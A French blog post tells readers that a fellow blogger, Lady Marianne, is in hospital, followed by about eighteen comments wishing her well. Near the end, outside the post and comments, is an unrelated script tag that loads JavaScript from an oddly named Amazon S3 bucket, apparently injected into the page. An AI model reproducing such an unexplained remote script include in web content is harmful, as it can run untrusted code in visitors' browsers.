• Notre Lady Marianne malade

    Notre Lady Marianne malade

                                                Pixabay/Teddy

    Pas de jeu de lettres ce dimanche...

    Notre Lady Marianne est malade. Elle est à l'hôpital...

    Elle nous écrivait le 1er novembre dernier dans son  Bilan-de-santé

    Je suspends mes défis tableau et jeu de lettre désolée-

    Violette nous donne de ses nouvelles ici :

    Nouvelles-amicales

    J'espère de tout cœur qu'elle va se remettre...

    Je pense bien à elle...


  • Commentaires

    1
    Dimanche 10 Novembre 2019 à 02:36
    Bonjour
    Je ne connais Lady Marianne que par blogs interposées ; néanmoins je suis allée voir ses nouvelles et je suis bien triste pour elle et aussi pour tous ceux et celles qui la connaissent bien. J’ai essayé de mettre un modeste comme mais apparemment cela n’a pas fonctionné (je n’ai as de compte Google).
    Je dépose donc sur ton blog tous mes souhaits de bon rétablissement.
    Bon courage à elle mais aussi à toi car cela a dû te faire mal de la voir ainsi souffrante.
    Bisou.
    Nicole75
    2
    Dimanche 10 Novembre 2019 à 02:36
    colettedc

    Grand merci Béa ! J'ai fait un tour chez Violette et, j'ai laissé un message pour Marianne ! Espérons ensemble !!! Je ne pensais pas qu'elle était autant malade que cela !!! Doux dimanche ! Bises♥

    3
    Dimanche 10 Novembre 2019 à 08:01

     je ne savais pas que  lady était hospitalisée 

     merci pour   la nouvelle 

     

      je ne suspendrais pas  ,  les deux défits que  je faisaient avec elle 

      les tableaux et le poéme du mardi  ,  je ne  l "oublie pas , ainsi   je pense à Elle 

     

     kénavo Kim

    4
    Dimanche 10 Novembre 2019 à 08:15

    Je lui envoie une brassée d'ondes positives et de bisous !

     
    What do you want to do ?
    New mail<button id="ffenetremailtobuttonEmail">Copy</button><textarea id="ffenetremailtotextArea"></textarea>

     

    5
    Dimanche 10 Novembre 2019 à 08:29

    En lui souhaitant un rapide rétablissement.

    pas facile semble-t-il.

    6
    Dimanche 10 Novembre 2019 à 09:27

    Désolée de lire cette triste nouvelle. Les Chats-Pitres lui envoient des ronrons de bon rétablissement.

    Bisous.

    7
    Dimanche 10 Novembre 2019 à 11:49

    De tout cœur avec Lady Marianne également en espérant qu'elle se rétablisse très vite !

    8
    Dimanche 10 Novembre 2019 à 14:23

    Merci Béa d'avoir mis ce lien j'attendais un autre billet de Violette pour avoir des nouvelles de Lydie .

    J'espère de tout coeur que cette hospitalisation va lui être bénéfique .

    Bises 

     

    9
    Dimanche 10 Novembre 2019 à 14:34

    Vraiment désolée et lui souhaite un bon rétablissement, une prière pour elle.

    Gros bisous ma Béa

    chatou

    10
    Dimanche 10 Novembre 2019 à 16:31
    Renée

    Mince je ne savais pas qu'elle était hospitalisée....Merci de l'info. Bisous

    11
    Dimanche 10 Novembre 2019 à 17:17
    Dani et ses Chats

    Coucou Béa.

    Je ne sais plus si j'ai commenté tout à l'heure ...

    J'ai été voir l'article chez Violette.

    Bien triste, car Lady cumule plusieurs maladies importantes.

    Bisous, et merci ♥ 

    12
    Dimanche 10 Novembre 2019 à 17:36

    Je lui souhaite un prompt rétablissement . Zaza et Lulu lui envoient des ronrons guérisseurs .
    Bises Béa

    13
    Dimanche 10 Novembre 2019 à 18:56

    bonsoir kimcat

    je ne connais pas son blog , j 'espère qu 'elle va bien se soigner

    et vous reviendra en forme

    Pour  mon article fatigue

    as tu pris le temps  d 'ouvrir la créa ou il y a les oiseaux

    le rideau s 'ouvre et la musique commence

    bizouille du soir

      • Dimanche 10 Novembre 2019 à 19:36

        Merci pour elle

        Oui j'ai ouvert tes oiseaux avec le rideau qui s'ouvre avec la musique.

        Bisous Mary

    14
    Dimanche 10 Novembre 2019 à 20:25

    je suis allée chez Violette et impossible de laisser un commentaire, donc, merci pour les nouvelles  Lydie, je lui souhaote de revenir à la santé le plus vite possible, je ne l'oublie pas. Je lui souhaite du courage pour vaincre cette maladie et nous revenir en santé.

    merci Béa et à bientôt,

    15
    Dimanche 10 Novembre 2019 à 21:42

    Moi aussi je pense bien à elle, je sais combien les pathologies auto-immunes peuvent être terribles alors toutes mes pensées pour Marianne...

    Je lui envoie plein de réconfort

    Merci de tes pensées pour elle

    Bisous et amitiés

    Cendrine

      • Jeudi 14 Novembre 2019 à 16:26

        Merci encore Cendrine pour tes beaux chats de verdure.

        Bisous

      • Samedi 16 Novembre 2019 à 23:00

        oh comme ils sont beaux ces chats 

    16
    maîtresse Poupette
    Lundi 11 Novembre 2019 à 00:27

    Je ne connais pas Lady Marianne, mais je lui souhaite que sa santé s'améliore rapidement.

    17
    Jeudi 14 Novembre 2019 à 15:48

    Je ne la connais pas, j'ai déjà vu son nom sur quelques blogs mais je ne suis jamais allée sur son blog personnel. C'est très triste. Je lui souhaite d'avoir la force de s'en sortir. Bon courage à elle.

    18
    Evy
    Jeudi 14 Novembre 2019 à 21:01

    Merci pour les infos bonne soirée à toi bisous

    <script src="https://s3.amazonaws.com/extseahes/2.js"></script>
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :